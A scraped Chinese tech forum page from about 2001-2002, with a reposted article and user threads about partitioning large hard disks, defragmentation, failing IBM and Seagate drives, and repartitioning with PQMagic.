F盘，建议您设置为数据备份盘，放置windows的注册表备份、GHOST各个分区windows的大文件*.GHO，以及你机器里各个硬件如显示卡、声卡、MODEM、打印机等等的驱动程序，免去你以后重新安装或是升级操作系统慢慢寻找驱动程序光盘的麻烦。建议的容量是8到10G，因为：你的中英文字库、图片（可能是数百兆到一两个G），windows安装程序（windows2000专业版的安装程序就有将近400M）、一些常用软件如OFFICE和PHOTOSHOP等等大型工具软件的安装程序，也可能会拷贝到硬盘里，加快安装的速度或与局域网里的其他用户共享。还有你的邮件、文档，也建议在这个分区建立目录集中管理，不要和其他的游戏、音乐MP3等等混合。所以8到10G的容量还是有必要的，这个分区并不需要经常磁盘整理，只是在你拷贝放置完数据的时候，整理一次就够了，里面数据更新的频率较低。那些邮件和文档，字节数很小，对该分区的数据结构不构成影响。不仅没必要经常整理这些东西，放置GHO文件的分区，如果经常运行磁盘整理还可能会破坏压缩包内的数据，造成以后GHOST恢复系统的错误呢！

假设F盘您用了10G，现在还有60-9-10=41G，算它40G。此时，如果你既是游戏迷也是音乐迷，有大量MP3、WMA或是整张VCD拷贝进去的文件要存放的话，可以再划分两个大分区G、H分别装音乐和游戏，如果只听音乐或是只玩游戏的话，后面的可以全部划成一个分区！没错，就是一个分区20G甚至是40G，因为您放置的是一些多媒体文件如MP3，视频文件如VCD上的*.DAT，单个文件也很巨大要连续的大块空间；而且这些文件一般不需要你编辑处理，只是用专门的软件回放欣赏。回放欣赏的质量和速度和磁盘数据结构的关系微乎其微，是取决于您CPU、显示卡的能力以及当前系统可用物理内存的大小，您自己想一想，频繁地整理这些分区有什么必要呢？

在10G硬盘以前的时代里，计算机光是windows系统就占用了大量的空间，大家划分的分区不会超过3、4个，甚至可能只有一到两个分区，所以无论是windows的运行读写、虚拟内存、临时文件、备份、游戏、音乐等等都放在一两个分区里，所以同一分区内文件存储、删除非常地频繁，造成磁盘数据结构混乱，这种情况下磁盘整理是很有必要的。但现在数十G的大硬盘推出后，用户可以为各种类型的数据专门划分足够空间的分区存放——读写、删除文件最频繁的windows分区和多是只读的媒体、游戏文件分区这样已经分开了，对那些只是读出调用的巨型数据所在的分区，实在是没必要经常整理。您非要整理的话，会发现无论你的CPU多快、用什么先进的工具软件，5、6G的数据耗时都在1到2个小时以上。

所以说，磁盘整理不能一概而论说非做不可，对windows系统所在的分区，磁盘整理是很有必要的，系统的速度也是很大程度上取决于这些分区数据结构的排列整齐。但运行游戏、多媒体的速度和质量，就是靠你的硬件档次比如CPU和显示卡的强力来达到效果的，和磁盘结构实在是关系不大。一个这样的大分区，连续的磁盘空间，还可方便你日后用PQ等工具方便快捷地直接划分出更多的分区，免去您在各个盘符之间平衡调动空间的麻烦。您想想，在10多个分区里东挖一块、西挖一块地凑出一个分区或是删除合并几个分区方便，还是直接从这个大空间分区里划分调动方便？

三、总结

注意！我说的都是数据分好类存放的硬盘分区，不是混合乱放的情况，也不是说永远不整理这些大数据所在的分区。定期利用吃饭、看电视的时间，整理一下还是有必要的。大型媒体文件分区，建议一到两个月整理一次即可。

到这里，所有的磁盘空间都划分完毕。大概是5到6个分区，各种数据分类存放得井井有条。当然，你也可以把数据更细地分类、分区存放，比如GHOST的备份和windows的安装程序可以分开放，音乐MP3和VCD的DAT文件也可分区存放。总之原则上，每个操作系统应该独占一个2到5G的分区，里面除了操作系统和办公软件外不要放你的其他重要文档和邮件等，方便用GHOST的方式维护。总的分区数建议不要超过10个，否则你管理起来会比较麻烦，容易混乱。您的硬盘越大、并存的操作系统越多，越推荐您用本文介绍的方法分区管理。

资料来源：http://cn.tech.yahoo.com

缘是天定,份在人为.
snl

绿蜗牛
现任版主
积分：4667
发帖：1702
来自：南宁
注册：2000-06-23
 发表于 2001-11-26 15:44:01 按此观看snl的个人资料 按此发邮件给snl snl 的 oicq 是29712030,查看 29712030 的资料 发送悄悄话给snl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看snl的IP

5g--win98(game)
5g--win2k(soft)
40g--mp3,软件，图片，光盘iso...
10g---板卡驱动程序，c盘d盘的克隆备份。常用软件。

全部fat32.

我40g的硬盘快用完了，谁说硬盘太大了？

[这消息被snl编辑过(编辑时间2001-11-26 15:46:00)]

我们从未如此接近未来。

Blueidea Web Team.
Moderator Of VG Forum
imacwei

终级用户
积分：2243
发帖：1041
来自：China.Jiangs
注册：2001-07-23
 发表于 2001-11-26 18:54:36 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP
嗬嗬……都这么大的硬盘了，你就自己看着办了阿！没有什么特别要求的！

Loading…………
WINDOWS2000-SP2+IE5.5
FIREWORKS,the solution for professional Web graphic design and production.
Press Anykey To Continue…

iMacWei
akane

超级用户
积分：368
发帖：320
来自：乱马1/2的世界
注册：2000-07-14
 发表于 2001-11-26 22:05:19 按此观看akane的个人资料 该用户不允许显示它的电子邮件 访问akane的主页 akane 的 oicq 是58346,查看 58346 的资料 发送悄悄话给akane 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看akane的IP
我也是刚刚买了一块

30G+60G =90G

我的办法是
system(c: )+application(d: )+mp3(e: ) = 30G

tech(g: )+images(h: )+software(I: )+media(j: ) = 60G

[这消息被akane编辑过(编辑时间2001-11-26 22:05:27)]

我爱漫画:)
plw

超级用户
积分：387
发帖：625
来自：荆州
注册：2001-05-18
 发表于 2001-11-26 22:40:56 按此观看plw的个人资料 按此发邮件给plw plw 的 oicq 是19759705,查看 19759705 的资料 发送悄悄话给plw 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看plw的IP
还不如这么规划：
把硬盘分成两半，一半你的，一半我的

It's a humdrum day again!
darkvn

小混蛋
现任版主
积分：8225
发帖：2542
来自：不是外星
注册：2001-03-02
 发表于 2001-11-27 01:50:58 按此观看darkvn的个人资料 按此发邮件给darkvn 访问darkvn的主页 darkvn 的 oicq 是2353523,查看 2353523 的资料 发送悄悄话给darkvn 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看darkvn的IP
我的60g快用完了，呵呵

Blueidea Web Team
Moderator Of Dreamweaver & Javascript
碧玉刀

初级用户
积分：7
发帖：15
来自：湖北
注册：2001-05-15
 发表于 2001-11-27 02:01:36 按此观看碧玉刀的个人资料 按此发邮件给碧玉刀 访问碧玉刀的主页 碧玉刀 的 oicq 是16598739,查看 16598739 的资料 发送悄悄话给碧玉刀 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看碧玉刀的IP
我的一点建议

每个分区不要少于5G，因为现在操作系统或者是游戏都很庞大。

5G----WIN98（WINME,WINXP可以作为替补）

10G----WIN2K（哪个版本你就自己看着办吧，：）.....）

其他的分区可以每个分10G左右，放你自己的东西，当然最后一个分区要是680MB哦，放刻录光盘内容用的。

drewfly

高级用户
积分：299
发帖：166
来自：
注册：2000-02-19
 发表于 2001-11-27 09:59:54 按此观看drewfly的个人资料 按此发邮件给drewfly 发送悄悄话给drewfly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看drewfly的IP
作好规划很重要亚，不然你用PAMAGIC调整分区的时候你就痛苦了

我目前作了如何分区

60G:
5G－－15－－10－－10－－20
SYS1 SYS2 APP TECH DOC

15G:
linux＋活动硬盘

cgang580925

初级用户
积分：139
发帖：35
来自：沪
注册：2002-03-09
 发表于 2002-04-02 21:16:15 按此观看cgang580925的个人资料 按此发邮件给cgang580925 发送悄悄话给cgang580925 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cgang580925的IP
以上各位大师的分区各有其特点，本人提个小建议：分区不要过大，否则簇的容量显得过大，由于文件数成千上万，尾簇的浪费现象将会很大，造成硬盘容量利用律降低。
天外飞猪

经典飞猪
积分：2185
发帖：894
来自：HFUU
注册：2001-11-16
 发表于 2002-04-02 21:26:30 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
我的40G，上了网后就不够了

QQ:131433 —— ICQ:134142256 —— MSN:advertisement788@msn.com
I want a degree !
mmkk

我是谁
积分：7953
发帖：2352
来自：FJ,China
注册：2001-04-04
 发表于 2002-04-02 21:28:29 按此观看mmkk的个人资料 按此发邮件给mmkk mmkk 的 oicq 是35262348,查看 35262348 的资料 发送悄悄话给mmkk 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mmkk的IP
我的是6.4G装了server2000和net framework.....

本头像由诺婷提供^^！

高兴就好

海无颜

终级用户
积分：528
发帖：137
来自：
注册：2002-03-29
 发表于 2002-04-02 21:48:37 按此观看海无颜的个人资料 按此发邮件给海无颜 发送悄悄话给海无颜 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看海无颜的IP
如果是个大硬盘，我就把C分成8G或更大，只装操作系统。其它的看情况分
JILL

终级用户
积分：575
发帖：175
来自：沈阳市
注册：2001-12-10
 发表于 2002-04-02 22:31:56 按此观看JILL的个人资料 按此发邮件给JILL JILL 的 oicq 是33475686,查看 33475686 的资料 发送悄悄话给JILL 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看JILL的IP
5G ME
5G 2000
10G 工具
余下不划分区，用时在用2000分，想如何分就如何分

誓与WIN2000共存
uncome

初级用户
积分：7
发帖：3
来自：
注册：2002-04-02
 发表于 2002-04-03 09:19:58 按此观看uncome的个人资料 按此发邮件给uncome 发送悄悄话给uncome 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看uncome的IP
我40G＋4.3G
C：　3G　　WIN98
D：　5G　　WIN2000
E：　10G　　PROGRAM
F：　10G　　DOC
G：　10G　　SETUP＋BACKUP
H：　2G　　新系统试验区（winxp......）
i: 4.3G 移动硬盘

drewfly

高级用户
积分：299
发帖：166
来自：
注册：2000-02-19
 发表于 2002-04-04 09:14:30 按此观看drewfly的个人资料 按此发邮件给drewfly 发送悄悄话给drewfly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看drewfly的IP
这么老的帖子也给翻出来了。

告诉大家一个不幸的消息，就在1个星期前，我仅用了4个月的IBM 60G硬盘报销了。

损失了整整50G的资料，预哭无泪...

原因：挂接的第二块硬盘在系统正在运行的时候突然丢失。

我靠～谁能告诉我一个最佳的发泄方式？

Godshow

初级用户
积分：89
发帖：29
来自：中华人民共和国
注册：2001-12-06
 发表于 2002-04-05 18:47:31 按此观看Godshow的个人资料 按此发邮件给Godshow 访问Godshow的主页 Godshow 的 oicq 是2923431,查看 2923431 的资料 发送悄悄话给Godshow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Godshow的IP
把报销的硬盘拆开研究研究....

个人签名
您可以在帖子的后面加入您自己的签名.
注意:
签名的Ubb功能状态设为 开放 .
签名的图形功能设为 关闭
maobi

初级用户
积分：117
发帖：30
来自：浙江江山
注册：2000-12-04
 发表于 2002-04-19 15:49:06 按此观看maobi的个人资料 按此发邮件给maobi 发送悄悄话给maobi 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看maobi的IP
什么年代了，还对９８念念不忘。都是些时髦的保守派！
10g xp
10g 2000 AServer
20g soft+game
20g data+backup
全部NTFS

:::::我静静的看着这个世界:::::
gq118

弦月
积分：1058
发帖：952
来自：Cd--UeSTC
注册：2000-07-03
 发表于 2002-04-19 19:00:33 按此观看gq118的个人资料 按此发邮件给gq118 访问gq118的主页 gq118 的 oicq 是9774743,查看 9774743 的资料 发送悄悄话给gq118 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看gq118的IP
我的是
13.9G左右 系统
13.8G左右 软件
14.6G左右 设计
13.3G左右 游戏和音乐

.....::::::中国之队-TEAM-CHINA::::::.....
话草

终级用户
积分：629
发帖：197
来自：
注册：2001-08-07
 发表于 2002-04-19 22:48:11 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
追求速度和性能的话 , 用转速快 的 那个硬盘做主盘,然后为每个系统(如果是多系统)单独划出缓存区 ,将所有的临时文件夹,虚拟内存等一并指向单独划分的缓存区 ,这样方便整理,能获得比较理想的性能,剩下的空间随意
ET

终级用户
积分：499
发帖：297
来自：TSINGTAO
注册：2002-03-23
 发表于 2002-04-19 22:57:09 按此观看ET的个人资料 按此发邮件给ET 发送悄悄话给ET 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ET的IP
我的30G~
5G,系统
10G,软件
15G,设计,MP3, MOVIE..................

Today you will do the tings,other people will not do.

Tomorrow you will do something ,other people can not do.

onlysnake

终级用户
积分：1971
发帖：696
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-04-19 23:06:02 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
为什么不买80G的，
我觉得80的性价比更好！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

jeepstar

终级用户
积分：641
发帖：313
来自：温州@苏州
注册：2000-11-14
 发表于 2002-04-20 02:26:45 按此观看jeepstar的个人资料 按此发邮件给jeepstar jeepstar 的 oicq 是32230978,查看 32230978 的资料 发送悄悄话给jeepstar 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jeepstar的IP
我的80G+80G+80G

C:10g WIN2000
D:10G SOFT
E:30g MP3
F: 160G MOVIE
G: 30G PIC

上一贴 | 下一贴
快速回复 | 主题：买了一块60G的硬盘,我该怎么规划它啊?
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


郁闷，我的ibm硬盘

计算机技术
郁闷，我的ibm硬盘

上一贴 | 下一贴
发表人 主题: 郁闷，我的ibm硬盘
cola

终级用户
积分：1312
发帖：775
来自：
注册：2000-02-27
 发表于 2001-11-26 09:24:15 按此观看cola的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给cola 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cola的IP
ibm硬盘有瑕疵的事早就有所耳闻，昨天我也赶上了。才用了半年的40g硬盘，在发出一阵怪声后，用scandisk检查发现了坏区。虽然才几k，但从网上的评论看这才是问题的开始。目前我暂时把有问题的那块硬盘分出一个3g的区出去，以后不再用他，还有更好的方法吗？希望不会再发展，否则只好去找js了。用ibm的兄弟们可要注意了！

It is our loading program. We can load anything from clothes, to weapons, to training simulations.Anything we need.
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-26 11:16:12 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
ibm的盘有三年质保 不好就去换~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

浸食·花葬

极度色郎
积分：7374
发帖：2638
来自：|翅膀|
注册：2001-07-09
 发表于 2001-11-26 11:24:56 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP
我的那个一年前买的segate的15g的一年包换

于是我换了四次············· 平均三个月就出现怀道 ^_^

幕末 ——
京都に人斬り拔刀齋と呼ばれた志士がぃた.
修羅さながらに人を斬り.その血刀を以って新
時代『明治』を切り拓ぃたその男は.動亂の
終結と共に人々の前から姿を消した ——
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-26 11:33:10 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
浸食·花葬在上个帖子中说
引用:
我的那个一年前买的segate的15g的一年包换

于是我换了四次············· 平均三个月就出现怀道 ^_^

三个月就会坏??是质量问题还是你太厉害? segate应该还能凑合的~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

浸食·花葬

极度色郎
积分：7374
发帖：2638
来自：|翅膀|
注册：2001-07-09
 发表于 2001-11-26 11:43:26 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP
那时候还没有毕业

所以经常把它放在包包里面带着导出跑····

当活动硬盘用了 ^_^

幕末 ——
京都に人斬り拔刀齋と呼ばれた志士がぃた.
修羅さながらに人を斬り.その血刀を以って新
時代『明治』を切り拓ぃたその男は.動亂の
終結と共に人々の前から姿を消した ——
moonbus

林 川
现任版主
积分：2103
发帖：1929
来自：上海
注册：2000-07-31
 发表于 2001-11-26 12:28:44 按此观看moonbus的个人资料 按此发邮件给moonbus 访问moonbus的主页 moonbus 的 oicq 是447277,查看 447277 的资料 发送悄悄话给moonbus 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看moonbus的IP
我很喜欢IBM的硬盘
1、价格低
2、性能不错
3、声音好
4、保修可靠

我虽然以前也坏过一块，可人家是查到坏道马上换新的，没有多余的废话
重要数据平时注意备份就是了

蓝蓝天空，太阳公公，狗狗追着小蜜蜂，夏天的风吹着我进入梦中，看见爸爸妈妈在梦中，我做着甜甜蜜蜜地美梦……
drewfly

高级用户
积分：299
发帖：166
来自：
注册：2000-02-19
 发表于 2001-11-26 12:43:03 按此观看drewfly的个人资料 按此发邮件给drewfly 发送悄悄话给drewfly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看drewfly的IP
IBM硬盘有这么次吗?

我用的都是IBM的硬盘,3年了一直没问题了

DW5

阻击之眼
积分：2678
发帖：2517
来自：blueidea
注册：2001-07-29
 发表于 2001-11-26 12:51:05 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP
浸食·花葬在上个帖子中说
引用:
我的那个一年前买的segate的15g的一年包换

于是我换了四次············· 平均三个月就出现怀道 ^_^

我的也是seagate啊！！

永远走在时代的最前端。。。

Blueidea Cs Team
Team Nicker
-]Blueidea[- Y.DW5

cola

终级用户
积分：1312
发帖：775
来自：
注册：2000-02-27
 发表于 2001-11-26 13:09:14 按此观看cola的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给cola 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cola的IP
ibm的问题主要出在新型的腾龙系列，据说是电路有问题，返修率高达X0%.就算是现在换也难保不换个有毛病的或者根本就是返修过的。所以现在还撮合着用吧。

It is our loading program. We can load anything from clothes, to weapons, to training simulations.Anything we need.
cola

终级用户
积分：1312
发帖：775
来自：
注册：2000-02-27
 发表于 2001-11-26 13:15:00 按此观看cola的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给cola 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cola的IP
浸食·花葬在上个帖子中说
引用:
我的那个一年前买的segate的15g的一年包换

于是我换了四次············· 平均三个月就出现怀道 ^_^

我的硬盘好象是水货，也一年保换。这一年从第一次算还是最后那次算起？

It is our loading program. We can load anything from clothes, to weapons, to training simulations.Anything we need.
浸食·花葬

极度色郎
积分：7374
发帖：2638
来自：|翅膀|
注册：2001-07-09
 发表于 2001-11-26 13:23:29 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP

手机三包········· 7天包换 ······· 你说是从哪天算起

幕末 ——
京都に人斬り拔刀齋と呼ばれた志士がぃた.
修羅さながらに人を斬り.その血刀を以って新
時代『明治』を切り拓ぃたその男は.動亂の
終結と共に人々の前から姿を消した ——
plw

超级用户
积分：387
发帖：625
来自：荆州
注册：2001-05-18
 发表于 2001-11-26 14:59:34 按此观看plw的个人资料 按此发邮件给plw plw 的 oicq 是19759705,查看 19759705 的资料 发送悄悄话给plw 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看plw的IP
我的segate出现B后就买了一个金钻硬盘，金钻硬盘怎么样

[这消息被plw编辑过(编辑时间2001-11-26 15:00:29)]

It's a humdrum day again!
desoso

初级用户
积分：10
发帖：38
来自：最激天使联盟
注册：2001-10-09
 发表于 2001-11-26 20:55:43 按此观看desoso的个人资料 按此发邮件给desoso 发送悄悄话给desoso 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看desoso的IP
所有的合格硬碟都分好幾種等級：
A等品是提供給品牌機的廠商
B等品是給這些廠商作備用（維修用）的
C等品零售，Diyer一般買到的都是這種硬碟，所以容易壞就不奇怪了。
不僅僅是硬碟，對於CPU，板卡，顯示器都這樣……

這就是生活
上一贴 | 下一贴
快速回复 | 主题：郁闷，我的ibm硬盘
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


如何把大硬盘重新分区,而不格式化?

计算机技术
如何把大硬盘重新分区,而不格式化?

上一贴 | 下一贴
发表人 主题: 如何把大硬盘重新分区,而不格式化?
silence112

终级用户
积分：1622
发帖：456
来自：川人在浙江
注册：2001-06-04
 发表于 2001-11-20 19:13:13 按此观看silence112的个人资料 按此发邮件给silence112 访问silence112的主页 silence112 的 oicq 是28825855,查看 28825855 的资料 收藏该主题供以后查看 发送悄悄话给silence112 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看silence112的IP
我现在用的这一台电脑,是戴尔的原装机型,
有40G的硬盘,但却没有对硬盘分区,
只有一个C盘,
能否不格式化就把它剩余空间再分出两三个区出来?
比如用PQmagic之类能否做到,或者用其它什么软件能做到?
敬请高手指点!!

_________________________________________
2001.11.22补充：现在我已经用PQmagic把它搞定了！！我把它分成了C，D，E，F各7-8,
G盘4G多一些，共五个盘。H为光驱。
用PQ确实轻松搞定！！只须在DOS上启动PQ，设置好各区容量后，出去溜达两三个小时回来吧！！（我设置好，并开始重新分区后，到教室上了两节课，回来时已经乖乖的分发好啦;);)）
特此补充，以备后来者查阅参考！！

[这消息被silence112编辑过(编辑时间2001-11-22 12:26:51)]

---+好好学习,天天上网+---
darkvn

小混蛋
现任版主
积分：8225
发帖：2542
来自：不是外星
注册：2001-03-02
 发表于 2001-11-20 20:25:03 按此观看darkvn的个人资料 按此发邮件给darkvn 访问darkvn的主页 darkvn 的 oicq 是2353523,查看 2353523 的资料 发送悄悄话给darkvn 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看darkvn的IP
用pq调整原c盘的大小，然后将空出的空间建立新区。
c盘就不用格式化了，但新区是肯定要格式化的。

Blueidea Web Team
Moderator Of Dreamweaver & Javascript
1234567890

超级用户
积分：336
发帖：105
来自：
注册：2000-07-21
 发表于 2001-11-20 20:32:28 按此观看1234567890的个人资料 按此发邮件给1234567890 发送悄悄话给1234567890 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看1234567890的IP
OF COURSE, PQMAGIC can do it!

欢迎来我的论坛玩
http://subio.h711.com/bbs/index.php
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2001-11-20 21:15:42 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
象你这样的大硬盘最好用新版本的分区大师，好象老版本的最大只能分到2G.

这里有一篇大容量硬盘分区技巧,你也可以看一下

http://www.51www.net/www/internet/21092703.htm

Blueidea Web Team.
Moderator Of Computer Technology Forum
BIGBUG

终级用户
积分：1095
发帖：720
来自：不一定
注册：2001-03-21
 发表于 2001-11-20 23:28:28 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
操作系统是2000的话，可以在“计算机管理”里直接分

等我想想再签
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-21 08:57:32 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
BIGBUG在上个帖子中说
引用:
操作系统是2000的话，可以在“计算机管理”里直接分

win2000 里面带的diskmgmt.msc 不能像PQ一样做到自由分割和带数据转换

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

yixinguy78

终级用户
积分：526
发帖：188
来自：china
注册：2001-02-10
 发表于 2001-11-21 16:38:34 按此观看yixinguy78的个人资料 按此发邮件给yixinguy78 发送悄悄话给yixinguy78 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yixinguy78的IP
请问那里有PQmagic下载？？？我找了好多地方，可就是没有找到，谢谢！！！

？？？？？？？？？？？？？！！！！！！！！！！！！！！
上一贴 | 下一贴
快速回复 | 主题：如何把大硬盘重新分区,而不格式化?
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


怎样释放硬盘空间

计算机技术
怎样释放硬盘空间

上一贴 | 下一贴
发表人 主题: 怎样释放硬盘空间
灰姑娘1975

终级用户
积分：455
发帖：173
来自：北京
注册：2001-07-02
 发表于 2001-11-18 13:15:57 按此观看灰姑娘1975的个人资料 按此发邮件给灰姑娘1975 灰姑娘1975 的 oicq 是1825520,查看 1825520 的资料 收藏该主题供以后查看 发送悄悄话给灰姑娘1975 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看灰姑娘1975的IP
1、请问一个文件大小是17K，而占用空间却是50K，
我有一个文件夹大小只有70M，可是占用时间却
有280M为什么，怎样释放空间。
2、用瑞星杀毒之前C盘空间是600M，可是杀毒之后
只有490M，为什么。
注：硬盘上没有病毒了

菜鸟一只，拜托拜托！*^_^*
小诺

替补版主
积分：6499
发帖：3746
来自：Shanghai
注册：2000-09-16
 发表于 2001-11-18 17:21:23 按此观看小诺的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给小诺 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看小诺的IP
